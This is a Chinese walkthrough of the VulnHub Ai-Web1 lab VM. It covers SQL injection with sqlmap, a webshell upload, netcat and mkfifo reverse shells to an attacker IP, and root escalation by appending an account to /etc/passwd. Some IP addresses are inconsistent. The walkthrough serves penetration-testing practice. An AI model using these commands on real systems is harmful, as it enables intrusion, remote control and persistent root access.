vulnhub——Ai-Web1靶机渗透

目录

Ai-Web1靶机渗透

一、信息收集

二、sql注入

三、文件上传

四、反弹shell

五、提权


Ai-Web1靶机渗透

靶机下载:

官网地址:https://www.vulnhub.com/entry/ai-web-1,353/

攻击机:kali2024

一、信息收集

发下目标主机的IP为:192.168.201.141

用nmap工具扫描一下对方主机和服务

发现他打开了80端口

发现搜不到于是我们用工具去扫描一下

我们发现了两个目录,于是我们去访问一下

我们再去扫一下另一个路径,我们看到了一个php文件

二、sql注入

这里我们尝试一下是否存在sql注入

我们用burp抓一下包

这里我们知道了他要上传的地方,我们可以利用sqlmap进行脱库

sqlmap -u "http://192.168.201.141/se3reTdir777/" --data "uid=1&Operation=Submit"  --dbs #列出库
 

sqlmap -u "http://192.168.201.141/se3reTdir777/" --data "uid=1&Operation=Submit"  -D aiweb1 --tables #列出表

sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit"  -D aiweb1 -T user --columns #列出字段

sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit"  --level=3 --os-shell #
 

选择php(default)custom location(s) 

输入获取到的绝对路径:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

三、文件上传

首先我们写一个一句话木马

四、反弹shell

1、kali本地监听:nc -lvvp 6666(或者nc -lnvp)

2、蚁剑终端上nc反弹:nc -e /bin/bash 192.168.201.136 6666(发现-e参数不可用)

3、rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.201.141 6666 >/tmp/f

4、python -c "import pty;pty.spawn('/bin/bash')"(python写交互)

五、提权

searchsploit linux kernel 4.15.0-58-generic 搜一下相关的内核漏洞发现没有可以利用的 文件

openssl passwd -1 -salt admin 123456

echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /etc/passwd

  • 25
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值